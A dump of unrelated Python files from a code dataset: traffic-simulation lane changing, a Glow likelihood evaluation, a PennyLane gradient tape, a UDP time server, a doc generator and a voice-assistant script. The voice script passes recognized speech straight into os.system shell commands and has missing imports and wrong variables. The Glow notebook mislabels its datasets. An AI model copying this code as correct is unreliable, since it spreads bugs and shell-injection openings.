speed of the leading car\n        vf = front_car.get_speed()\n        # following gap\n        # below, the IDM formula is translated into code\n        ss = 2 + vb * 1.2 + vb * (abs(vb - vf)) / (2 * pow(1.5 * 2, 0.5))\n        k = 1\n        if ss <= 0:\n            k = 0\n        acc = 1.5 * (1 - pow(vb / self.iv, 4) -k * pow(ss / (distance - front_car_length), 2))\n\n        return acc\n\n    def idm_change_left(self):\n        waypoint = self.get_waypoint()\n        if waypoint.get_left_lane() is None:\n            print('Already in the leftmost lane, cannot change lanes!') # TODO: show this in the UI\n            return False\n\n        road_id, lane_id = waypoint.road_id, waypoint.lane_id\n        distance = self.get_waypoint_distance()\n        distance_backup = distance\n\n        # collect the vehicle lists for the current and the target lane\n        followList = self.get_follow_list(road_id, lane_id, distance, Globe_Var.IDM_RANGE)\n        lfollowList = self.get_follow_list(road_id, lane_id - 1, distance, Globe_Var.IDM_RANGE)\n\n        # sort by distance\n        followList.sort(key=lambda x: x[1])\n        lfollowList.sort(key=lambda x: x[1])\n\n        FVC, FV, PFVC, PFV = 0, 0, 0, 0\n\n        vehicle, distance = followList[0]\n        FVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n        for i in range(1, len(followList)):\n            vehicle, distance = followList[i]\n            front_car, fdistance = followList[i - 1]\n            FVC += self.idm_follow_model(distance - fdistance, vehicle,front_car)\n\n        vehicle, distance = lfollowList[0]\n        PFVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n\n        for i in range(1, len(lfollowList)):\n            vehicle, distance = lfollowList[i]\n            front_car, fdistance = lfollowList[i - 1]\n            PFVC += self.idm_follow_model(distance - fdistance, vehicle,\n                                          front_car)\n        for i in range(len(followList)):\n            vehicle, distance = followList[i]\n            FV += self.get_accelerometer()\n        for i in range(len(lfollowList)):\n            vehicle, distance = lfollowList[i]\n            PFV += self.get_accelerometer()\n\n        asv = self.vehicle.get_acceleration()\n        pasv = self.idm_follow_model(distance_backup, self.vehicle,self.get_forward_vehicle(road_id, lane_id, 
distance_backup))\n\n        # below, the lane-change utility formula is translated into code\n        usv = pasv - asv + 0.1 * (FVC - FV + PFVC - PFV)\n        if pasv < -2 or PFVC < -2:\n            self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n            print('Left lane change failed!')\n            return False\n\n        if usv <= 0.3:\n            self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n            print('Left lane change failed!')\n            return False\n\n        self.lane_change_type = 'left'\n        self.change_lane(self.lane_change_type)\n        print('Left lane change succeeded!')\n        return True\n\n    def idm_change_right(self):\n        waypoint = self.get_waypoint()\n        if waypoint.get_right_lane() is None:\n            print('Already in the rightmost lane, cannot change lanes!') # TODO: show this in the UI\n            return False\n\n        road_id = waypoint.road_id\n        lane_id = waypoint.lane_id\n        distance = self.get_waypoint_distance()\n        distance_backup = distance\n\n        # collect the vehicle lists for the current and the target lane\n        followList = self.get_follow_list(road_id, lane_id, distance, 300)\n        lfollowList = self.get_follow_list(road_id, lane_id + 1, distance, 300)\n\n        # sort by distance\n        followList.sort(key=lambda x: x[1])\n        lfollowList.sort(key=lambda x: x[1])\n\n        FVC, FV, PFVC, PFV = 0, 0, 0, 0\n\n        vehicle, distance = followList[0]\n        FVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n        for i in range(1, len(followList)):\n            vehicle, distance = followList[i]\n            front_car, fdistance = followList[i - 1]\n            FVC += self.idm_follow_model(distance - fdistance, vehicle,front_car)\n\n        vehicle, distance = lfollowList[0]\n        PFVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n\n        for i in range(1, len(lfollowList)):\n            vehicle, distance = lfollowList[i]\n            front_car, fdistance = lfollowList[i - 1]\n            PFVC += self.idm_follow_model(distance - fdistance, vehicle, front_car)\n\n        for i in range(len(followList)):\n            vehicle, distance = followList[i]\n            FV += self.get_accelerometer()\n\n        for i in range(len(lfollowList)):\n            vehicle, distance = lfollowList[i]\n            PFV += self.get_accelerometer()\n\n        asv = self.vehicle.get_acceleration()\n        pasv = self.idm_follow_model(distance_backup, self.vehicle,self.get_forward_vehicle(road_id, lane_id, distance_backup))\n\n        # below, the lane-change utility formula is translated into code\n        usv = pasv - asv + 0.1 * (FVC - FV + PFVC - PFV)\n        if pasv < -2 or PFVC < -2:\n            self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n            print('Right lane change failed!')\n            return False\n\n        if usv <= 0.3:\n            self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n            print('Right lane change failed!')\n            return False\n\n        self.lane_change_type = 'right'\n        self.change_lane(self.lane_change_type)\n        print('Right lane change succeeded!')\n\n        return True\n","sub_path":"intelligent_car.py","file_name":"intelligent_car.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"140750139","text":"import json\nimport ipdb\nimport torch\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nfrom datasets import get_CIFAR10, get_SVHN,get_CIFAR100\nfrom model import Glow\nimport sklearn.metrics\nimport numpy as np\n\ndevice = torch.device(\"cuda\")\n\noutput_folder = 'glow/'\nmodel_name = 'glow_affine_coupling.pt'\n\nwith open(output_folder + 'hparams.json') as json_file: \n    hparams = json.load(json_file)\n    \nprint(hparams)\nhparams['dataroot'] = '../mutual-information'\n\nimage_shape, num_classes, _, test_cifar = get_SVHN(hparams['augment'], hparams['dataroot'], hparams['download'])\n# image_shape, num_classes, _, test_cifar = get_CIFAR10(hparams['augment'], hparams['dataroot'], hparams['download'])\nimage_shape, num_classes, _, test_svhn = 
get_CIFAR100(hparams['augment'], hparams['dataroot'], hparams['download'])\n\nmodel = Glow(image_shape, hparams['hidden_channels'], hparams['K'], hparams['L'], hparams['actnorm_scale'],\n             hparams['flow_permutation'], hparams['flow_coupling'], hparams['LU_decomposed'], num_classes,\n             hparams['learn_top'], hparams['y_condition'])\n\nmodel.load_state_dict(torch.load(output_folder + model_name))\nmodel.set_actnorm_init()\n\nmodel = model.to(device)\n\nmodel = model.eval()\n\n# dataset = test_cifar\n# dataloader = torch.utils.data.DataLoader(dataset, batch_size=32, num_workers=6)\n# for x,y in dataloader:\n# \tbreak\n\n# x = x.to(device)\n# y = y.to(device)\n\n# with torch.no_grad():\n# \tzs, nll, logits = model(x, y_onehot=y)\n\n# with torch.no_grad():\n# \trecon = model(z=zs, reverse=True)\n# ipdb.set_trace()\n\n\ndef compute_nll(dataset, model):\n    dataloader = torch.utils.data.DataLoader(dataset, batch_size=512, num_workers=6)\n    \n    nlls = []\n    for x,y in dataloader:\n        x = x.to(device)\n        \n        if hparams['y_condition']:\n            y = y.to(device)\n        else:\n            y = None\n        \n        with torch.no_grad():\n            # _, nll, _ = model(x)\n            _, nll, _ = model(x, y_onehot=y)\n            nlls.append(nll)\n    \n    return torch.cat(nlls).cpu()\n\n\n# NOTE: 'test_cifar' actually holds the SVHN split loaded above, so the\n# variable names and plot labels below may not match the underlying data\ncifar_nll = compute_nll(test_cifar, model)\nsvhn_nll = compute_nll(test_svhn, model)\n\nprint(\"CIFAR NLL\", torch.mean(cifar_nll))\nprint(\"SVHN NLL\", torch.mean(svhn_nll))\nipdb.set_trace()\nscores = np.concatenate([cifar_nll[:10000], svhn_nll[:10000]])\nlabels = np.concatenate([np.ones_like(cifar_nll)[:10000], np.zeros_like(svhn_nll)[:10000]])\nscore = sklearn.metrics.roc_auc_score(labels, scores)\nprint(\"AUROC\", score)\n\nplt.figure()\nplt.title(\"Histogram Glow - trained on CIFAR10\")\nplt.xlabel(\"Negative bits per dimension\")\nplt.hist(-svhn_nll.numpy(), label=\"CIFAR100\", density=True, bins=30, alpha=.5)\nplt.hist(-cifar_nll.numpy(), label=\"CIFAR10\", density=True, bins=50, alpha=.5)\nplt.legend()\nplt.savefig('svhn.png')\n\n","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319677836","text":"# Copyright 2018-2020 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nQuantum tape that implements reversible backpropagation.\r\n\"\"\"\r\n# pylint: disable=attribute-defined-outside-init,protected-access\r\nfrom copy import copy\r\nfrom functools import reduce\r\nfrom string import ascii_letters as ABC\r\n\r\nimport numpy as np\r\n\r\nimport pennylane as qml\r\n\r\nfrom .jacobian_tape import JacobianTape\r\nfrom .tape import QuantumTape\r\n\r\n\r\nABC_ARRAY = np.array(list(ABC))\r\n\r\n\r\nclass ReversibleTape(JacobianTape):\r\n    r\"\"\"Quantum tape for computing gradients via reversible analytic differentiation.\r\n\r\n    .. 
note::\r\n\r\n        The reversible analytic differentiation method has the following restrictions:\r\n\r\n        * As it requires knowledge of the statevector, only statevector simulator devices can be used.\r\n\r\n        * Differentiation is only supported for the parametrized quantum operations\r\n          :class:`~.RX`, :class:`~.RY`, :class:`~.RZ`, and :class:`~.Rot`.\r\n\r\n    This class extends the :class:`~.jacobian` method of the quantum tape to support analytic\r\n    gradients of qubit operations using reversible analytic differentiation. This gradient method\r\n    returns *exact* gradients, but requires use of a statevector simulator. Simply create\r\n    the tape, and then call the Jacobian method:\r\n\r\n    >>> tape.jacobian(dev)\r\n\r\n    For more details on the quantum tape, please see :class:`~.JacobianTape`.\r\n\r\n    **Reversible analytic differentiation**\r\n\r\n    Assume a circuit has a gate :math:`G(\\theta)` that we want to differentiate.\r\n    Without loss of generality, we can write the circuit in the form of three unitaries: :math:`UGV`.\r\n    Starting from the initial state :math:`\\vert 0\\rangle`, the quantum state is evolved up to the\r\n    \"pre-measurement\" state :math:`\\vert\\psi\\rangle=UGV\\vert 0\\rangle`, which is saved\r\n    (this can be reused for each variable being differentiated).\r\n\r\n    We then apply the unitary :math:`V^{-1}` to evolve this state backwards in time\r\n    until just after the gate :math:`G` (hence the name \"reversible\").\r\n    The generator of :math:`G` is then applied as a gate, and we evolve forward using :math:`V` again.\r\n    At this stage, the state of the simulator is proportional to\r\n    :math:`\\frac{\\partial}{\\partial\\theta}\\vert\\psi\\rangle`.\r\n    Some further post-processing of this gives the derivative\r\n    :math:`\\frac{\\partial}{\\partial\\theta} \\langle \\hat{O} \\rangle` for any observable O.\r\n\r\n    The reversible approach is similar to backpropagation, but trades off extra computation for\r\n    enhanced memory efficiency. 
Where backpropagation caches the state tensors at each step during\r\n a forward pass, the reversible method only caches the final pre-measurement state.\r\n\r\n Compared to the parameter-shift rule, the reversible method can\r\n be faster or slower, depending on the density and location of parametrized gates in a circuit\r\n (circuits with higher density of parametrized gates near the end of the circuit will see a\r\n benefit).\r\n \"\"\"\r\n\r\n def _grad_method(self, idx, use_graph=True, default_method=\"A\"):\r\n return super()._grad_method(idx, use_graph=use_graph, default_method=default_method)\r\n\r\n @staticmethod\r\n def _matrix_elem(vec1, obs, vec2, device):\r\n r\"\"\"Computes the matrix element of an observable.\r\n\r\n That is, given two basis states :math:`\\mathbf{i}`, :math:`\\mathbf{j}`,\r\n this method returns :math:`\\langle \\mathbf{i} \\vert \\hat{O} \\vert \\mathbf{j} \\rangle`.\r\n Unmeasured wires are contracted, and a scalar is returned.\r\n\r\n Args:\r\n vec1 (array[complex]): a length :math:`2^N` statevector\r\n obs (.Observable): a PennyLane observable\r\n vec2 (array[complex]): a length :math:`2^N` statevector\r\n device (.QubitDevice): the device used to compute the matrix elements\r\n \"\"\"\r\n # pylint: disable=protected-access\r\n mat = device._reshape(obs.matrix, [2] * len(obs.wires) * 2)\r\n wires = obs.wires\r\n\r\n vec1_indices = ABC[: device.num_wires]\r\n\r\n obs_in_indices = \"\".join(ABC_ARRAY[wires.tolist()].tolist())\r\n obs_out_indices = ABC[device.num_wires : device.num_wires + len(wires)]\r\n obs_indices = \"\".join([obs_in_indices, obs_out_indices])\r\n\r\n vec2_indices = reduce(\r\n lambda old_string, idx_pair: old_string.replace(idx_pair[0], idx_pair[1]),\r\n zip(obs_in_indices, obs_out_indices),\r\n vec1_indices,\r\n )\r\n\r\n einsum_str = \"{vec1_indices},{obs_indices},{vec2_indices}->\".format(\r\n vec1_indices=vec1_indices,\r\n obs_indices=obs_indices,\r\n vec2_indices=vec2_indices,\r\n )\r\n\r\n return device._einsum(einsum_str, device._conj(vec1), mat, vec2)\r\n\r\n def jacobian(self, device, params=None, **options):\r\n # The parameter_shift_var method needs to evaluate the circuit\r\n # at the unshifted parameter values; the pre-rotated statevector is then stored\r\n # self._state attribute. 
Here, we set the value of the attribute to None\r\n # before each Jacobian call, so that the statevector is calculated only once.\r\n self._state = None\r\n return super().jacobian(device, params, **options)\r\n\r\n def analytic_pd(self, idx, device, params=None, **options):\r\n t_idx = list(self.trainable_params)[idx]\r\n op = self._par_info[t_idx][\"op\"]\r\n p_idx = self._par_info[t_idx][\"p_idx\"]\r\n\r\n # The reversible tape only support differentiating\r\n # expectation values of observables for now.\r\n for m in self.measurements:\r\n if (\r\n m.return_type is qml.operation.Variance\r\n or m.return_type is qml.operation.Probability\r\n ):\r\n raise ValueError(\r\n f\"{m.return_type} is not supported with the reversible gradient method\"\r\n )\r\n\r\n # The reversible tape only supports the RX, RY, RZ, and Rot operations for now:\r\n #\r\n # * CRX, CRY, CRZ ops have a non-unitary matrix as generator.\r\n #\r\n # * PauliRot, MultiRZ, U2, and U3 do not have generators specified.\r\n #\r\n # TODO: the controlled rotations can be supported by multiplying ``state``\r\n # directly by these generators within this function\r\n # (or by allowing non-unitary matrix multiplies in the simulator backends)\r\n\r\n if op.name not in [\"RX\", \"RY\", \"RZ\", \"Rot\"]:\r\n raise ValueError(\r\n \"The {} gate is not currently supported with the \"\r\n \"reversible gradient method.\".format(op.name)\r\n )\r\n\r\n if self._state is None:\r\n self.execute_device(params, device)\r\n self._state = device._pre_rotated_state\r\n\r\n self.set_parameters(params)\r\n\r\n # create a new circuit which rewinds the pre-measurement state to just after `op`,\r\n # applies the generator of `op`, and then plays forward back to\r\n # pre-measurement step\r\n wires = op.wires\r\n op_idx = self.operations.index(op)\r\n\r\n # TODO: likely better to use circuitgraph to determine minimally necessary ops\r\n between_ops = self.operations[op_idx + 1 :]\r\n\r\n if op.name == \"Rot\":\r\n decomp = op.decomposition(*op.parameters, wires=wires)\r\n generator, multiplier = decomp[p_idx].generator\r\n between_ops = decomp[p_idx + 1 :] + between_ops\r\n else:\r\n generator, multiplier = op.generator\r\n\r\n generator = generator(wires)\r\n\r\n diff_circuit = QuantumTape()\r\n diff_circuit._ops = [copy(op).inv() for op in between_ops[::-1]] + [generator] + between_ops\r\n\r\n # set the simulator state to be the pre-measurement state\r\n device._state = self._state\r\n\r\n # evolve the pre-measurement state under this new circuit\r\n device.execute(diff_circuit)\r\n dstate = device._pre_rotated_state # TODO: this will only work for QubitDevices\r\n\r\n # compute matrix element for each observable O\r\n matrix_elems = device._asarray(\r\n [self._matrix_elem(dstate, ob, self._state, device) for ob in self.observables]\r\n # TODO: if all observables act on same number of wires, could\r\n # do all at once with einsum\r\n )\r\n\r\n # reset state back to pre-measurement value\r\n device._pre_rotated_state = self._state\r\n\r\n return 2 * multiplier * device._imag(matrix_elems)\r\n","sub_path":"pennylane/tape/tapes/reversible.py","file_name":"reversible.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26378133","text":"from remimi.generators.parallax_video_generator import ParallaxVideoGeneratorOption\n\n\nlooking_glass_8_9_inpaint_option = ParallaxVideoGeneratorOption(\n video_input_width = 820, \n video_input_height = 460,\n stereo_baseline 
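# A minimal NumPy sketch of the same kind of matrix-element contraction that
# _matrix_elem performs above, assuming a two-wire state and a single-wire
# Pauli-Z observable on wire 0; all names here are illustrative, not the
# PennyLane API itself.
import numpy as np

num_wires = 2
psi = np.random.rand(2 ** num_wires) + 1j * np.random.rand(2 ** num_wires)
phi = np.random.rand(2 ** num_wires) + 1j * np.random.rand(2 ** num_wires)
pauli_z = np.array([[1, 0], [0, -1]], dtype=complex)

# <psi| Z (x) I |phi>: index a is wire 0 (acted on by Z), b is wire 1,
# which is simply contracted between the two statevectors.
elem = np.einsum("ab,ac,cb->", np.conj(psi).reshape(2, 2), pauli_z, phi.reshape(2, 2))
print(elem)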
= 0.00000140,\n focal_length=2000.0,\n inpaint=True,\n foreground_forward_z=0.7\n)\n\nDEFAULT_OPTIONS = {\n \"looking_glass_8_9_inpaint_option\": looking_glass_8_9_inpaint_option,\n}","sub_path":"configs/quilit_video_generator.py","file_name":"quilit_video_generator.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"243320915","text":"#!/usr/bin/env python\nimport sys\n\nSTART_YEAR = 2008\nEND_YEAR = 2018\n\n\ndef respect_condition(year):\n return year in range(START_YEAR, END_YEAR + 1)\n\n\nfor line in sys.stdin:\n data = line.strip().split(',')\n\n if len(data) == 8:\n ticker, _, close, _, _, _, volume, date = data\n\n if ticker != 'ticker':\n year = int(date[0:4])\n\n if respect_condition(year):\n print('{}\\t{}\\t{}\\t{}'.format(ticker, date, close, volume))\n","sub_path":"job1/mapreduce/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"11032293","text":"import socket\nimport datetime\n\n# Server settings\nIP = \"127.0.0.1\"\nPORT = 20001\n\n# Create the socket\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as server_socket:\n # Bind the socket to IP and PORT\n server_socket.bind((IP, PORT))\n print(\"[INFO] Server is ready and waiting for clients...\")\n\n # Loop forever, listening for clients\n while True:\n # Receive data from a client\n data, address = server_socket.recvfrom(1024)\n data = data.decode(\"utf-8\")\n \n # Check whether the request asks for the time\n if data == \"Show time\":\n # Send the current time back to the client\n time = str(datetime.datetime.now().time())\n server_socket.sendto(time.encode(\"utf-8\"), address)\n else:\n # Any request other than a time request shuts the server down\n print(\"[INFO] Closing server...\")\n break\n","sub_path":"Labs/Laba_3_KSIT/test_one/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"600807256","text":"\n\n# Local variable: a variable defined inside a function is called a local variable\n# Property: its scope is the inside of the function; it cannot be used outside the function\n\n#\n# def f1():\n# # A variable defined inside the function is a local variable\n# a = 1\n# print(a)\n\n\n# f1()\n# print(a)\n\n\n# Global variable: a variable defined outside any function is called a global variable\n# Property: it can be used outside a function as well as inside one\n\na = 1\n\nprint(a)\n\ndef f1():\n print(a)\n\nf1()\n\n# When several scopes would satisfy a lookup, the variable with the smallest scope is used","sub_path":"尚硅谷Python学科爬虫教程/代码/046_尚硅谷_爬虫_函数_函数的局部变量和全局变量.py","file_name":"046_尚硅谷_爬虫_函数_函数的局部变量和全局变量.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"603713463","text":"import ast\nimport os\nimport re\n\npaths = ['../../mpf/mpf', '../../mpf-mc/mpfmc']\nrst_path = '../events'\n\n\nclass EventDocParser(object):\n\n def __init__(self):\n self.file = None\n self.file_list = list()\n\n def parse_file(self, file_name):\n\n self.file = file_name\n\n with open(file_name) as f:\n my_ast = ast.parse(f.read())\n\n for x in ast.walk(my_ast):\n if isinstance(x, ast.Str) and (x.s.strip().lower().startswith(\n 'event:')):\n event, rst = self.parse_string(x)\n\n if rst:\n filename = self.create_file(event, rst)\n self.file_list.append((event, filename))\n\n def write_index(self):\n\n index = '''Event reference\n===============\n\nHere's a list of all the \"built in\" events that are included in MPF and the\nMPF MC. 
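# A minimal client sketch for the UDP time server above, assuming the server
# is running locally on 127.0.0.1:20001; the "Show time" command string is
# taken from the server code.
import socket

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client_socket:
    client_socket.sendto("Show time".encode("utf-8"), ("127.0.0.1", 20001))
    reply, _ = client_socket.recvfrom(1024)
    print("Server time:", reply.decode("utf-8"))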
Of course your own machine could include custom events that aren't\non the list here.\n\nSee the :doc:`Event Manager Overview ` for more information on\nhow MPF uses events.\n\n.. toctree ::\n :maxdepth: 1\n\n'''\n\n self.file_list.sort()\n\n for file_name in self.file_list:\n index += ' {} <{}>\\n'.format(file_name[0], file_name[1][:-4])\n\n with open(os.path.join(rst_path, 'event_reference.rst'), 'w') as f:\n f.write(index)\n\n def create_file(self, event, rst):\n filename = event.replace('(', '').replace(')', '') + '.rst'\n\n with open(os.path.join(rst_path, filename), 'w') as f:\n f.write(rst)\n\n return filename\n\n def parse_string(self, string):\n # string = string.s.replace('\\n', ' ') # strip newlines\n # string = ' '.join(string.s.split(' ')) # strip extra spaces\n string = '\\n'.join(' '.join(line.split())\n for line in string.s.split('\\n'))\n\n string = string.replace('Event:', 'event:')\n string = string.replace('Desc:', 'desc:')\n\n try:\n string = string.replace('Args:', 'args:')\n except ValueError:\n pass\n\n final_dict = self.string_to_args_dict(string, ['event', 'desc',\n 'args'])\n\n if 'desc' not in final_dict:\n # not an events docstring\n return (None, None)\n\n return self.build_rst_entry(final_dict)\n\n def string_to_args_dict(self, string, args):\n index_starts = list()\n\n for arg in args:\n try:\n index_starts.append(string.index(arg + ':'))\n except ValueError:\n pass\n\n index_starts.sort()\n sliced_list = list()\n for x in range(len(index_starts)):\n try:\n sliced_list.append(string[index_starts[x]:index_starts[\n x + 1]])\n except IndexError:\n sliced_list.append(string[index_starts[x]:])\n\n final_dict = dict()\n\n for entry in sliced_list:\n split_entry = entry.split(':', 1)\n final_dict[split_entry[0].strip()] = split_entry[1].strip()\n\n return final_dict\n\n def build_rst_entry(self, final_dict):\n rst_output = str()\n\n # write the title\n try:\n rst_output += final_dict['event']+ '\\n'\n except KeyError:\n print(\"Events entry missing from: {}\".format(self.file))\n\n rst_output += ('=' * len(final_dict['event'])) + '\\n\\n'\n rst_output += '*MPF Event*\\n\\n'\n\n # add the description\n rst_output += final_dict['desc'] + '\\n\\n\\n'\n\n # add the keyword arguments section\n\n rst_output += 'Keyword arguments\\n'\n rst_output += '-----------------\\n\\n'\n\n if 'args' in final_dict:\n rst_output += self.parse_args(final_dict['args'])\n else:\n rst_output += '*None*\\n'\n\n return final_dict['event'], rst_output\n\n def parse_args(self, args_string):\n\n args = list()\n output = str()\n\n for x in re.findall('\\\\b(\\w*)\\\\b(?=\\:)', args_string):\n if x:\n args.append(x)\n\n args_dict = self.string_to_args_dict(args_string, args)\n\n for k, v in sorted(args_dict.items()):\n output += k + '\\n'\n output += ('~' * len(k)) + '\\n'\n output += v + '\\n\\n'\n\n return output\n\nif __name__ == '__main__':\n a = EventDocParser()\n\n # delete existing files\n for path, _, files in os.walk(rst_path):\n for file in files:\n if file not in ['index.rst', 'event_types.rst']:\n os.remove(os.path.join(path, file))\n\n # walk through the folders to scan\n for path in paths:\n for root, _, files in os.walk(path):\n for file in [x for x in files if x.endswith('.py')]:\n a.parse_file(os.path.join(root, file))\n\n # create the index.rst based on everything that was found\n 
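# A stripped-down sketch of the ast-walking idea that parse_file uses above:
# walk a parsed module and pick out string literals that start with "event:".
# The sample source below is illustrative only.
import ast

sample_source = '''
def post_event():
    """event: ball_drained
    desc: Posted when a ball drains."""
'''

for node in ast.walk(ast.parse(sample_source)):
    if isinstance(node, ast.Str) and node.s.strip().lower().startswith('event:'):
        print(node.s)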
a.write_index()\n","sub_path":"_doc_tools/build_events_reference_docs.py","file_name":"build_events_reference_docs.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128038106","text":"__author__ = 'benvc'\nimport speech_recognition as sr\n\n\n# Load voice engine settings\nengine = pyttsx.init()\n# rate for how fast the voice speaks\nengine.setProperty('rate', 167)\nvoices = engine.getProperty('voices')\n\n# Welcome message for user\nwelcomeMsg = \"Welcome Sir\"\nengine.say(welcomeMsg)\nengine.runAndWait()\n# only outer scoped variable\nrequest = \"\"\n\n\n#Functions for things\ndef Googling(i):\n import os\n #base google results url\n googlelink = \"https://www.google.ca/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=\"\n\n # Replace all text implementations\n i = i.replace(\"Aries \", \"\")\n i = i.replace(\"google \", \"\")\n i = i.replace(\" please\", \"\")\n i = i.replace(\" for me\", \"\")\n # speech\n engine.say(\"searching for \" + i)\n engine.runAndWait()\n # replace spaces with %20 for google search\n i = i.replace(\" \", \"%20\")\n # Concatenation of string\n googlelink = 'start chrome \"%s%s\"' % (googlelink, i)\n # open Chrome\n os.system(googlelink)\n for x in range(3):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"--\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n # Fetch the problem problem to give the proper output\n try:\n print(\"Google Request: \" + request)\n except sr.UnknownValueError:\n print(\"No Audio Detected\")\n except sr.RequestError as e:\n print(\"Internal Error\")\n if \"open first link\" in str(request):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open second link\" in str(request):\n for x in range(2):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open third link\" in str(request):\n for x in range(3):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open fourth link\" in str(request):\n for x in range(4):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open fifth link\" in str(request):\n for x in range(5):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open sixth link\" in str(request):\n for x in range(6):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n\ndef machineTime():\n import time\n #Time (localtime off machine)\n dt = list(time.localtime())\n hourtime = dt[3]\n minutetime = dt[4]\n #Calculate AM/PM plus hours and minutes\n if hourtime > 12:\n hourtime -= 12\n timeOfDay = \"PM\"\n else:\n timeOfDay = \"AM\"\n if minutetime < 10:\n minute1 = 0\n else:\n minute1 = \"\"\n time = str(hourtime) + \":\" + str(minute1) + str(minutetime) + str(timeOfDay)\n return(time)\n\ndef openexes(i):\n if \"open wow\" in str(i) or \"open world or warcraft\" in str(i):\n engine.say(\"Opening World of Warcraft\")\n engine.runAndWait()\n # Open WoW\n os.system('C:\\Program Files (x86)\\World of Warcraft')\n\n elif \"open mine craft\" in str(i) or \"open minecraft\" in str(i):\n engine.say(\"Opening minecraft\")\n engine.runAndWait()\n # open Minecraft\n os.system('\"C:/Users/benvc/Desktop/Minecraft.exe\"')\n\n elif \"open steam\" in str(i):\n engine.say(\"Opening Steam\")\n engine.runAndWait()\n # open Steam\n os.system('\"C:/Users/benvc/Desktop/Steam.exe\"')\n else:\n\n # Replace all text implementations and obsurities\n i = i.replace(\"Aries 
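# A minimal capture-and-recognize sketch of the listen loop used throughout
# this file, assuming a working microphone and the speech_recognition package
# (recognize_google also needs network access).
import speech_recognition as sr

recognizer = sr.Recognizer()
try:
    with sr.Microphone() as source:
        print("Listening...")
        audio = recognizer.listen(source)
    text = recognizer.recognize_google(audio).lower()
    print("Heard:", text)
except sr.UnknownValueError:
    print("No audio detected")
except sr.RequestError:
    print("Speech service unavailable")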
\", \"\")\n i = i.replace(\"open\", \"\")\n i = i.replace(\"please\", \"\")\n i = i.replace(\"dot\", \".\")\n i = i.replace(\" \", \"\")\n # Get engine to speak\n engine.say(\"Opening \" + request)\n engine.runAndWait()\n # format the website URL with the chrome starter\n SiteURL = 'start chrome \"%s\"' % request\n # actually open it\n os.system(SiteURL)\n\ndef AriesIdle(i):\n # Remove the text leaving time and h/m/s\n i = i.replace(\"Aries\", \"\")\n # Speech\n engine.say(i)\n engine.runAndWait()\n i = i.replace(\"idle\", \"\")\n i = i.replace(\"for\", \"\")\n i = i.replace(\" \", \"\")\n # If statements\n if \"hour\" in str(i) or \"hours\" in str(i):\n i = i.replace(\"hour\",\"\")\n i = i.replace(\"s\",\"\")\n i = float(i) * 60 * 60\n time.sleep(float(i))\n\n elif \"minute\" in str(request) or \"minutes\" in str(i):\n i = i.replace(\"minute\",\"\")\n i = i.replace(\"s\",\"\")\n i = float(i) * 60\n time.sleep(float(i))\n\n elif \"second\" in str(request) or \"seconds\" in str(i):\n i = i.replace(\"second\",\"\")\n i = i.replace(\"s\",\"\")\n time.sleep(float(i))\n\ndef writeNote(i):\n # Remove Aries and commands\n i = i.replace(\"Aries\", \"\")\n i = i.replace(\"make a note\", \"\")\n i = i.replace(\"make note\", \"\")\n i = i.replace(\"write a note\", \"\")\n i = i.replace(\"take note\", \"\")\n ts = time.time()\n date1 = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n f = open(\"C://Users/benvc/Desktop/AriesNotes.txt\", \"a\")\n f.write(str(date1) + \": \" + i + \"\\n\")\n f.close()\n # Speech\n engine.say(\"Note Written\")\n engine.runAndWait()\n #print(\"Note Written\")\n#TODO\ndef closeExe(i):\n i = 